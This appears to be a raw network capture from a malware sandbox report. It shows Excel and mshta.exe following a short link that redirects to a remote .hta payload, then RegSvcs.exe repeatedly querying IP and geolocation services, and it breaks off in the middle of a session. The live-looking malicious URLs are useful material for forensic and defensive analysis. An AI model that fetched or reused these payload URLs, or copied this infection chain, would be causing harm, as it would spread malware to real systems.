                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  17 | 192.168.2.22 | 49201 | 193.122.130.0 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Sep 30, 2024 10:13:10.859591007 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:11.298773050 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:11 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 5a1c53990e4b7346de40005197e64140
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:13:11.508704901 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:11 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 5a1c53990e4b7346de40005197e64140
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  0 | 192.168.2.22 | 49163 | 172.67.216.244 | 443 | 3344 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:12:17 UTC | 319 | OUT | GET /cIP5a8 HTTP/1.1
                                                                                  Accept: */*
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: og1.in
                                                                                  Connection: Keep-Alive
2024-09-30 08:12:19 UTC | 819 | IN | HTTP/1.1 302 Found
                                                                                  Date: Mon, 30 Sep 2024 08:12:19 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 83
                                                                                  Connection: close
                                                                                  location: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
                                                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                                                  vary: Accept
                                                                                  x-content-type-options: nosniff
                                                                                  x-dns-prefetch-control: off
                                                                                  x-download-options: noopen
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-xss-protection: 0
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOQL5fI%2BBstzGsZhd4G4zjRtMTBt3CFzQayX%2BAGm6A%2FGus406LhGSo17O0vFMlmsuVS9Y7V8sXWSEKen6Pf9baC6JK8nbErsg4Lgf9BaszNbs52SX0lkwTI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2bf44384a425b-EWR
2024-09-30 08:12:19 UTC | 83 | IN | Data Ascii: Found. Redirecting to http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49165 | 172.67.216.244 | 443 | 3624 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-30 08:12:21 UTC | 343 | OUT | GET /cIP5a8 HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: og1.in
                                                                                  Connection: Keep-Alive
2024-09-30 08:12:22 UTC | 819 | IN | HTTP/1.1 302 Found
                                                                                  Date: Mon, 30 Sep 2024 08:12:22 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 83
                                                                                  Connection: close
                                                                                  location: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
                                                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                                                  vary: Accept
                                                                                  x-content-type-options: nosniff
                                                                                  x-dns-prefetch-control: off
                                                                                  x-download-options: noopen
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-xss-protection: 0
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aTR0MGzAyCjA9EHpW2ccC4CVos5SUf3t896JxFV5t%2FoWHeDQfu%2FK8lVz75jpVwpq7hT9PsCXjjAWb5%2BJTtua6hcAofkmcV8IENWgYTTWuA8OCOZVz3yzueA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2bf5a49c719cf-EWR
2024-09-30 08:12:22 UTC | 83 | IN | Data Ascii: Found. Redirecting to http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49168 | 172.67.216.244 | 443 | 3344 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-09-30 08:12:40 UTC | 319 | OUT | GET /cIP5a8 HTTP/1.1
                                                                                  Accept: */*
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: og1.in
                                                                                  Connection: Keep-Alive
2024-09-30 08:12:41 UTC | 851 | IN | HTTP/1.1 302 Found
                                                                                  Date: Mon, 30 Sep 2024 08:12:41 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 83
                                                                                  Connection: close
                                                                                  location: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
                                                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                                                  vary: Accept
                                                                                  x-content-type-options: nosniff
                                                                                  x-dns-prefetch-control: off
                                                                                  x-download-options: noopen
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-xss-protection: 0
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sf3DveMAx2%2Bd5JvpW7nq2sd3GALAzQk%2BgZWRa6VWGy9QJZnnMgAjM0FhyELmKKsee9ioYx%2Bhhj0NGd7B8Mn4PvpQiU8fYVLf2gXCjVpVU%2BUPjwlfiolz95M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2bfd10d8441f3-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
2024-09-30 08:12:41 UTC | 83 | IN | Data Ascii: Found. Redirecting to http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49169 | 104.21.78.54 | 443 | 3996 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-30 08:12:42 UTC | 343 | OUT | GET /cIP5a8 HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: og1.in
                                                                                  Connection: Keep-Alive
2024-09-30 08:12:43 UTC | 823 | IN | HTTP/1.1 302 Found
                                                                                  Date: Mon, 30 Sep 2024 08:12:43 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 83
                                                                                  Connection: close
                                                                                  location: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
                                                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                                                  vary: Accept
                                                                                  x-content-type-options: nosniff
                                                                                  x-dns-prefetch-control: off
                                                                                  x-download-options: noopen
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-xss-protection: 0
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6WWImi%2F%2B3CFy5%2F78tDZcL7ZszUnm%2Fe7XMDQPk9GjpB0vagIOw3LNhVx8LQudaO64P1jcNE9ClBL%2FFn3sTVRTu7KS7jFWNyOh6khpPROy9LrIR9ZaPJSUSB4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2bfdee94341c1-EWR
2024-09-30 08:12:43 UTC | 83 | IN | Data Ascii: Found. Redirecting to http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49174 | 188.114.96.3 | 443 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-30 08:12:49 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
2024-09-30 08:12:49 UTC | 670 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: EXPIRED
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=daoQcWtu2eaBocRj4XKyG9H9vfuKNcTY4iPPqre%2FHI0NCztaYB4PfVX%2BQ%2FzwkEalkipvhNKpXT3q3zMlRePGhDY7BLgijzbtVuMxbaJwO4VMiVV0FVHjiagrSOiT7gYrTrR%2BLPoR"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c006ee50431f-EWR
2024-09-30 08:12:49 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 08:12:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49175 | 188.114.96.3 | 443 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-30 08:12:50 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
2024-09-30 08:12:50 UTC | 710 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:50 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 1
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fH%2FrIYJsVQcWFstM2lL%2FtyHWQjDp6mKhe%2FpGwaHcQk7l%2Btkki0COALq56m%2BGgTRGBpKzKr%2B0pT5apX03YWya0OO3hehCa79jY1WmGNzIxSj7sgKTk3JefF0aU8z8%2F64E4dK17FID"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c00ced398cbd-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
2024-09-30 08:12:50 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 08:12:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49177 | 188.114.96.3 | 443 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-30 08:12:51 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
2024-09-30 08:12:51 UTC | 672 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:51 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 2
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tk6smGenOnTb%2B9PQbY6nlsouAz0ohFe1dwrTtlhDkaZtqlMgkK0lDrIUPjw2u%2BFSQXEYsteqPXrckLuumnOahqQotU0qRM6Izw5TmYGgDb6zTrA9SLPVDv05eKO49t3V%2FWt5FcKn"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c018894b4374-EWR
2024-09-30 08:12:51 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-30 08:12:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49179 | 188.114.97.3 | 443 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-30 08:12:53 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
2024-09-30 08:12:53 UTC | 674 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:53 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 4
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j7GbI1%2BYyxL62Z4amyHeLfDqlfgfjptN92Wxi9jXYSDijGo98wH1h9or6yfuQ5kwA5CDYSPy6LtgC4%2Fy54Uk7BtxK5ZGD5e4xwu%2Fok6k7IO4qsUwbi6tAolbA5%2FwlOOtj17PjedR"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0214bf372b1-EWR
                                                                                  2024-09-30 08:12:53 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  8 | 192.168.2.22 | 49181 | 188.114.96.3 | 443 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:12:54 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:54 UTC | 670 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:54 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 5
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dC%2Fzfe1pHtrc%2Fyu3k2n2v3KMP191MDdKCt1hv9a2CCJoqvtOr4fIUcWmd0qV9MA0pxD65hSkPTwKpnNrW3rrUYuJALYBmh4XHcYEUsghs2ZivLKsNGu3lTRLeCDkFjzbClcSUiBB"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c02abb188ccc-EWR
                                                                                  2024-09-30 08:12:54 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  9 | 192.168.2.22 | 49183 | 188.114.96.3 | 443 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:12:56 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:56 UTC | 702 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:56 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 7
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2RYl%2BmAEswg9KdZKL0jrPFUsxBn0UcPuJCg3a%2BMpuBQbGJnpqtanOgUFv5iq5noVuLK9%2BrAmx10NVr8lAe1CSJeTA28EV8fbSnCxIT2jKrwR8F9ZOtEfiLO30c2O6zTO3rOz3Gnx"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c035abb6729e-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-09-30 08:12:56 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  10 | 192.168.2.22 | 49185 | 188.114.96.3 | 443 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:12:58 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:12:58 UTC | 668 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:58 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 9
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHO1c4GyGQLL23LFAtcqgsVJob68zsam57UweUBfRv8pa9TDIbz4%2BRrqEaEpZGS9K2WBilwAQSyisoN8qSzKmuyJtsvurdklbLvsa7Sz1f7PBhcHL12dckHGBoikGAWaySDXTICK"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0407e8dc32f-EWR
                                                                                  2024-09-30 08:12:58 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:12:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.2.22 | 49188 | 188.114.96.3 | 443 | 3108 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:13:00 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:13:01 UTC | 667 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 11
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oeDfrxoV6okTkHE8AIj2nuBgrctrjQ7DUTxDV1LWh2B5UZpJXi04drRudpXKqxy1GlcS250RfBqAVrNstmUNiv81jSgPADwCzgZdwiApflKNBa2MA9OeaJlRamz07rDUxzMjyxZm"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c0512ef518b8-EWR
                                                                                  2024-09-30 08:13:01 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  12 | 192.168.2.22 | 49189 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:13:01 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-30 08:13:01 UTC | 675 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:01 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 12
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyKVZZg5PTBRJw2t7uXPmK%2FKuTuI57%2BHYjzEPv5BKblAUV4JDkzUekfgAwXlEeKad7Hm%2B7eV%2FI0H5qp8BXHJGXkVYrDBgFZUdML5FnWFoq3zatisUimHocvhI7AGpCDTzthhOQ40"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cb2c05428320f6b-EWR
                                                                                  2024-09-30 08:13:01 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                  2024-09-30 08:13:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.2.22 | 49190 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-09-30 08:13:02 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  2024-09-30 08:13:02 UTC | 673 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:02 GMT
                                                                                  Content-Type: application/xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  access-control-allow-origin: *
                                                                                  vary: Accept-Encoding
                                                                                  Cache-Control: max-age=86400
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 13
                                                                                  Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT
